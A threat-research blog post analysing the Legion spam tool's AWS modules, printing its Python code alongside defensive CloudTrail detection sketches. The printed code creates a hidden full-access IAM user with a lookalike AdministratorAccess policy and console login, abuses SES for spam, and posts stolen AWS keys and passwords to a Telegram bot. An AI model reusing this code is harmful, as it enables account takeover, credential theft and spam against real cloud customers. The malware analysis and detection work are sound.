Legion: The Latest Threat in Mass Spam Attacks

Summary

As the old proverb says, “Great minds think alike.” Many people may not know or remember the second half of that proverb: “Fools seldom differ.” Both halves are well represented in this article. Researchers (great minds) from Permiso and Cado Security simultaneously stumbled onto a new attack tool, dramatically named Legion, that focuses on mail abuse and SMS spam via services like Amazon SES and Twilio. The tool looks eerily similar (fools seldom differ) to AndroxGh0st, Greenbot, VIOLENT, and a few other for-sale spam attack scripts.

In the spirit of collaboration, Cado and Permiso researchers are tag-teaming a breakdown of Legion’s toolset. Since we (Permiso) have already talked at length about similar variants, the rest of this article dives into how Legion differs from AndroxGh0st and Greenbot. For a full breakdown of Legion specifically, head over to the Cado Security blog.

Legion Modules

Legion has many different modules for various technologies. In this article we are going to focus on a few of the modules that are specific to AWS. If you would like to ride along, you can find this script on VirusTotal (MD5: ddc6963f98e57090e0a78559c7212498).

Persistence

Our favorite feature in these scripts is the persistence. Legion mostly uses the same playbook as similar tools, with one extra touch: it adds a tag to the IAM user it creates.

create_new_user

By default, Legion creates a user named ses_legion for persistence. One thing that stands out with Legion compared to similar tools is that it also adds the tag Owner:ms.boharas to the created user. While it is often hard to understand an attacker’s motivations, we suspect this was added to evade detections that look for users created with no tags associated with them.

def create_new_user(iam_client, user_name='ses_legion'):
        user = None
        try:
                user = iam_client.create_user(
                        UserName=user_name,
                        Tags=[{'Key': 'Owner', 'Value': 'ms.boharas'}]
                    )
        except ClientError as e:
                if e.response['Error']['Code'] == 'EntityAlreadyExists':
                        result_str = get_random_string()
                        user_name = 'ses_{}'.format(result_str)
                        user = iam_client.create_user(UserName=user_name,
                        Tags=[{'Key': 'Owner', 'Value': 'ms.boharas'}]
                    )
        return user_name, user
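
For defenders, the hard-coded user name and tag make a convenient indicator. The following is a minimal sketch, assuming CloudTrail records for CreateUser carry requestParameters.userName and a requestParameters.tags list of key/value pairs. The helper name and the field casing are assumptions and should be checked against your own logs.

```python
# Hypothetical helper: flags a CloudTrail record that matches the
# user name prefix or the tag hard-coded in Legion's create_new_user.
LEGION_TAG = ("owner", "ms.boharas")

def is_legion_create_user(record):
    if record.get("eventName") != "CreateUser":
        return False
    params = record.get("requestParameters") or {}
    name = params.get("userName", "")
    tags = params.get("tags") or []
    # Accept either key casing, since the log field casing is an assumption.
    tag_pairs = {
        (str(t.get("key", t.get("Key", ""))).lower(),
         str(t.get("value", t.get("Value", ""))))
        for t in tags
    }
    # The "ses_" prefix covers both ses_legion and the random fallback name.
    return name.startswith("ses_") or LEGION_TAG in tag_pairs
```

The name prefix alone will match legitimate users in some environments, so the tag match is the stronger of the two signals.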

creat_new_group

Legion creates a group named SESAdminGroup. Attackers often use generic names like this when creating groups, policies, and users.

def creat_new_group(iam_client, group_name='SESAdminGroup'):
        try:
                res = iam_client.create_group(GroupName=group_name)
        except ClientError as e:
                if e.response['Error']['Code'] == 'EntityAlreadyExists':
                        result_str = get_random_string()
                        group_name = "SESAdminGroup{}".format(result_str)
                        res = iam_client.create_group(GroupName=group_name)
        return res['Group']['GroupName']

creat_new_policy

Legion creates a policy named AdministratorAccess that allows all actions against all resources. If a policy with that name already exists, it appends a random string to the name instead. This is an attempt to masquerade as the default AdministratorAccess AWS managed policy.

def creat_new_policy(iam_client, policy_name='AdministratorAccess'):
        policy_json = {"Version": "2012-10-17","Statement":
        [{"Effect": "Allow", "Action": "*","Resource": "*"}]}
        try:
                res = iam_client.create_policy(
                        PolicyName=policy_name,
                        PolicyDocument=json.dumps(policy_json)
                        )
        except ClientError as e:
                if e.response['Error']['Code'] == 'EntityAlreadyExists':
                        result_str = get_random_string()
                        policy_name = "AdministratorAccess{}".format(result_str)
                        res = iam_client.create_policy(PolicyName=policy_name,
                                PolicyDocument=json.dumps(policy_json)
                                )
        return res['Policy']['Arn']
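
One way to tell the lookalike apart from the real thing is the account field of the policy ARN: AWS managed policies use the literal value aws there, while a policy created by Legion carries the victim’s account ID. The sketch below illustrates that check; the function name is hypothetical.

```python
def is_lookalike_admin_policy(policy_arn):
    """True for a customer managed policy whose name starts with AdministratorAccess."""
    # ARN layout: arn:partition:iam::account:policy/optional-path/name
    parts = policy_arn.split(":", 5)
    if len(parts) != 6 or parts[2] != "iam":
        return False
    account, resource = parts[4], parts[5]
    if not resource.startswith("policy/"):
        return False
    name = resource.rsplit("/", 1)[-1]
    # AWS managed policies have "aws" in the account field.
    return account != "aws" and name.startswith("AdministratorAccess")
```

The prefix match also catches the randomized fallback name, at the cost of flagging any legitimately named customer policy that starts the same way.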

creat_profile

When setting a password for the created user, Legion sets PasswordResetRequired to False, so the attacker is not forced to change the password at first console sign-in.

def creat_profile(iam_client, user_name, pwd):
        response = iam_client.create_login_profile(
            UserName=user_name, Password=pwd, PasswordResetRequired=False)
        return response

initialize_item

Of note in the initialize_item function: Legion falls back to the us-east-1 region when none is supplied, though this is configurable.

def initialize_item(item, service='ses'):
        ACCESS_ID = item['id']
        ACCESS_KEY = item['key']
        REGION = item['region']
        if REGION is None:
                REGION = 'us-east-1'
        try:
                return boto3.client(service, region_name=REGION,
                        aws_access_key_id=ACCESS_ID,
                        aws_secret_access_key=ACCESS_KEY
                        )
        except Exception:
                return

make_user

The make_user function pulls this all together:

  • Creates a new user with the name ses_legion and the tag Owner:ms.boharas

  • Creates a group with the name SESAdminGroup

  • Creates a policy called AdministratorAccess that gives full access

  • Attaches the policy directly to the ses_legion IAM user

  • Sets a password

  • Creates a login profile for console access abilities

  • Adds the ses_legion IAM User to the group SESAdminGroup

  • Logs the result of this activity to a Telegram bot

def make_user(iam_client, item, limit_data):
        try:
                user_name, user_data = create_new_user(iam_client)
                grp_name = creat_new_group(iam_client)
                policy_arn = creat_new_policy(iam_client)
                up = att_usr_policy(iam_client, user_name, policy_arn)
                password = "{}0089#".format(user_name)
                profile = creat_profile(iam_client, user_name, password)
                added_to_grp = att_usr_grp(iam_client, user_name, grp_name)

                if user_data:
                        user_arn = user_data['User']['Arn']
                        user_id = None
                        if user_arn:
                                user_id = user_arn.split(':')[4]

                        with open('AWS_ByPass/!Users_Cracked.txt', 'a') as tt:
                                dd = json.dumps(user_data, indent=4, sort_keys=True, default=default)
                                data = ("ACESS_ID={}\nACCESS_KEY={}\nREGION={}\nAmazon IAM User & Pass\n"
                                        "Username={}\nPassword={}\nID={}\n")\
                                .format(item['id'], item['key'], item['region'],user_name, password, user_id)
                                tt.write(data + "\n")
                                tt.write(dd + "\n\n")
                                tt.write("Limit for user:\n")
                                if limit_data:
                                        tt.write(limit_data + "\n")
                                tt.write("{}\n".format("*" * 10))

                                message = {'text': f"🔥  Legion SMTP 6.5 BOT [AWS Console]\n🏦 Amazon IAM User & Pass\n\nUser: {user_name}\nPass= {password}\nIAM= {user_id}\n\nACESS_ID= {item['id']}\nACCESS_KEY= {item['key']}\nREGION= {item['region']}\nAWS Console Hacked ❤\n"}
                                requests.post("https://api.telegram.org/bot" + bot_token +"/sendMessage?chat_id=" + chat_id ,data=message)
                                print(f"{yl}[{fc}AWS CHECKER{yl}] {gr}CREATED ID: {fc}{item['id']} {gr}and Access Token/UserID {fc}{user_id}")
        except IOError as e:
                print(f"{yl}[{fc}AWS CHECKER{yl}] {red}Error writing to file for new {fc}USER")
        except ClientError as e:
                print(f"{yl}[{fc}AWS CHECKER{yl}] {red}Failed to create user with ID: {fc}{item['id']}")
        except Exception as e:
                print(f"{yl}[{fc}AWS CHECKER{yl}] {red}Create Failed: {item['id']}")
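
Because make_user issues the same IAM calls every time, the burst of calls is itself a detection opportunity. The sketch below assumes CloudTrail records parsed into dicts with eventName, eventTime (in the form 2023-04-13T12:00:00Z), and userIdentity.accessKeyId. The mapping of att_usr_policy and att_usr_grp to AttachUserPolicy and AddUserToGroup is an assumption, since those helpers are not shown here. The function name and the five-minute window are illustrative choices, not Permiso’s production detection.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# IAM event names assumed to correspond to the calls made by make_user.
PERSISTENCE_EVENTS = {
    "CreateUser", "CreateGroup", "CreatePolicy",
    "AttachUserPolicy", "CreateLoginProfile", "AddUserToGroup",
}

def find_persistence_bursts(records, window=timedelta(minutes=5)):
    """Return access key IDs that issued every persistence event within `window`."""
    by_key = defaultdict(list)
    for rec in records:
        name = rec.get("eventName")
        key = (rec.get("userIdentity") or {}).get("accessKeyId")
        if key and name in PERSISTENCE_EVENTS:
            ts = datetime.strptime(rec["eventTime"], "%Y-%m-%dT%H:%M:%SZ")
            by_key[key].append((ts, name))

    flagged = []
    for key, events in by_key.items():
        events.sort()
        # For each start point, collect the distinct event names inside the window.
        for i, (start, _) in enumerate(events):
            seen = {n for t, n in events[i:] if t - start <= window}
            if seen == PERSISTENCE_EVENTS:
                flagged.append(key)
                break
    return flagged
```

Matching on the set of calls rather than on names like ses_legion keeps the check useful when a variant changes its hard-coded strings.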

Amazon Simple Email Service (SES) Abuse

One of the goals of Legion is to abuse SES in order to send mass spam emails. The modules below are part of this functionality.

check_limit

Legion assesses the email sending capability of an account by examining the Max24HourSend response element. A Max24HourSend value of 200 signifies that the key and account are in sandbox status, which will not provide a means of abuse. Any value greater than 200 may indicate a potential for attack. If the account is not in sandbox status, subtracting the SentLast24Hours response element from Max24HourSend gives the number of messages that can still be sent within the 24-hour period. However, as a spoiler, it doesn’t appear that Legion’s authors entirely understood the idea of the sandbox, or else they didn’t care and preferred to let the script error out until it moves on to the next account.

def check_limit(ses_client, item):
        try:
                l = ses_client.get_send_quota()
                return f"{item['id']}:{item['key']}:{item['region']}:{l['SentLast24Hours']}/{l['Max24HourSend']} Remaining"
        except Exception as e:
                print(f"{yl}[{fc}AWS CHECKER{yl}] {red}Limit Failed: {item['id']}")
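
The quota arithmetic described above can be written out as a short sketch. It assumes a dict shaped like the get_send_quota response and uses the sandbox value of 200 cited in this article; the function name and the sample numbers are hypothetical.

```python
SANDBOX_DAILY_QUOTA = 200  # sandbox Max24HourSend value cited in the article

def summarize_quota(quota):
    """Derive sandbox status and remaining sends from a send-quota response."""
    max_send = quota["Max24HourSend"]
    sent = quota["SentLast24Hours"]
    return {
        "sandbox": max_send == SANDBOX_DAILY_QUOTA,
        "remaining": max(max_send - sent, 0),
    }

# Made-up sample values for illustration.
sample = {"Max24HourSend": 50000.0, "SentLast24Hours": 1250.0, "MaxSendRate": 14.0}
print(summarize_quota(sample))  # {'sandbox': False, 'remaining': 48750.0}
```

By contrast, the string built by check_limit for the same values would end in 1250.0/50000.0 Remaining, which is sent over maximum rather than an actual remaining count.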

check_sending

Somewhat self-explanatory: Legion wants to verify the data by sending a message. To do this, it sends an email using the sender and receiver data it has available. A successful send, meaning the email was accepted for delivery, returns a MessageId response element, which Legion later checks for before writing the successful details to file.

def check_sending(client, receiver, sender, item, limit_info, iam):
        subj = f"{item['id']}"
        msg = f"*** SMTP DATA ***\n\n"\
        f"{item['id']}:{item['key']}:email-smtp.{item['region']}.amazonaws.com:587\n\n"\
        f"AWS_ID:     {item['id']}\nAWS_KEY:    "\
        f"{item['key']}\nAWS_REGION: {item['region']}\nFROM:       {sender}\n"\
        f"SERVER:     email-{item['region']}.amazonaws.com\nPORT:       587 or 25\n\n"\
        f"IAM_USER:   {iam}\n\nLimit Info: {limit_info}"
        try:
                return client.send_email(
                        Source=sender,
                        Destination={'ToAddresses': receiver},
                        Message={
                        'Subject': {'Data': f'SMTP_KEY: email-smtp.{item["region"]}.amazonaws.com',
                        'Charset': 'UTF-8'},
                        'Body': {'Text': {
                        'Data': msg,
                        'Charset': 'UTF-8'
                        },
                        }
                }
            )
        except Exception as e:
                pass

get_identities, fetch_user, process, begin_check

In the final functions around SES abuse, Legion starts by returning a list of identities via get_identities. fetch_user is called from begin_check to verify the user creation process. The created user is based on the obtained credentials and is written to a file along with the data from check_limit. Why Legion chooses to write the limit details along with the user is unclear; note that the SES send quota is not per user but per account.

The process function brings many of the previous steps together and is later called by begin_check, which passes along the result of check_limit when it exists. Although Legion checks that the limit data exists several times leading up to the process call, it checks once more inside the function before running get_identities and looping through the identities as the sender for check_sending.

If a MessageId is returned from check_sending, Legion considers this a success and writes to the success file !Good_ses_smtp.txt. Otherwise it writes to the failed file !BAD_ses_smtp.txt and posts the failed information to its Telegram chat. It’s here that Legion could have saved time by recognizing that a sandboxed account will always fail unless sending to verified emails or domains.

def get_identities(client):
        try:
                return client.list_identities()['Identities']
        except Exception:
                pass

def fetch_user(client):
        try:
                return client.get_user()['User']
        except Exception:
                pass

def process(ses_client, receiver, item, limit=None, iam=None):
        if limit:
                limit = limit.split(':')[3]
        idt = get_identities(ses_client)
        res = None
        if idt:
                for fr in idt:
                        res = check_sending(ses_client, receiver, fr, item, limit, iam)
                        if res:
                                with open('AWS_ByPass/!Good_ses_smtp.txt', 'a') as lr:
                                        sm = f"{item['id']}:{item['key']}:email-{item['region']}-1.amazonaws.com:{fr}:587:{limit}\n"
                                        lr.write(sm)
                                print(f"{yl}[{fc}AWS CHECKER{yl}] {gr}SENDING SUCCESSFUL: {yl}{item['id']} : {gr}{limit}")
                                break
                if not res:
                        with open('AWS_ByPass/!BAD_ses_smtp.txt', 'a') as lr:
                                sm = f"{item['id']}:{item['key']}:{item['region']}\n"
                                message = {'text': f"🔥  Legion SMTP 6.5 BOT [AWS STATUS]\n🏦 KEY= {item['id']}\nSECRET= {item['key']}\nREGION= {item['region']}\nSTATUS=> Sending Paused ⛔\n"}
                                requests.post("https://api.telegram.org/bot" + bot_token +"/sendMessage?chat_id=" + chat_id ,data=message)

                                lr.write(sm)
                                print(f"{yl}[{fc}AWS CHECKER{yl}]  {red}Sending Failed: {yl}{sm}")

def begin_check(d, to=emailnow):
        item = {}
        limit = None
        data = d.split(':')
        total = len(data)
        bcode = 'TEVHSU9OIDYuNg=='
        receiver = [to, base64.b64decode(bcode).decode('utf-8')]
        iam_user = None
        if total >= 3:
                if data[2]:
                        item['id'] = data[0]
                        item['key'] = data[1]
                        item['region'] = data[2]
                        ses_client = initialize_item(item)
                        if ses_client:
                                limit = check_limit(ses_client, item)
                        iam_client = initialize_item(item, service='iam')
                        if iam_client:
                                mu = make_user(iam_client, item, limit)
                                iam = fetch_user(iam_client)
                        if limit:
                                remain = limit.split(':')[3]
                                print(f"{yl}[{fc}AWS CHECKER{yl}]  {fc}Limit for {item['id']}: {remain}")
                                process(ses_client, receiver, item, limit=limit, iam=None)
                        else:
                                print(f"{yl}[{fc}AWS CHECKER{yl}]  {red}Failed limit check: {item['id']}")
                                process(ses_client, receiver, item, limit=None, iam=None)
        else:
                print(f"[!] Skipped: {d}")
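
Two small details in begin_check are easy to verify by hand. The sketch below decodes the hard-coded bcode value and shows what limit.split(':')[3] extracts from a string in the format built by check_limit. The credential values in the sample string are placeholders, not real data.

```python
import base64

# Value hard-coded in begin_check; it becomes the second entry of the receiver list.
bcode = "TEVHSU9OIDYuNg=="
second_receiver = base64.b64decode(bcode).decode("utf-8")
print(second_receiver)  # LEGION 6.6

# Placeholder string in the id:key:region:sent/max format built by check_limit.
limit = "AKIAEXAMPLE:secretEXAMPLE:us-east-1:0.0/200.0 Remaining"
remain = limit.split(":")[3]
print(remain)  # 0.0/200.0 Remaining
```

In the code as shown, the decoded value is a version-style string rather than an email address.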

Conclusion

Mail and SMS abuse are big business for attackers. We have come across close to a dozen variants of similar scripts that are regularly sold for nefarious purposes. Legion is not the first, nor will it be the last. Luckily, given the number of similarities among these toolsets, the methodology-based detections we put in place and described in /blog/s/approach-to-detection-androxgh0st-greenbot-persistence are resilient enough to detect all the variants we have discovered so far being used against any of our clients here at Permiso.
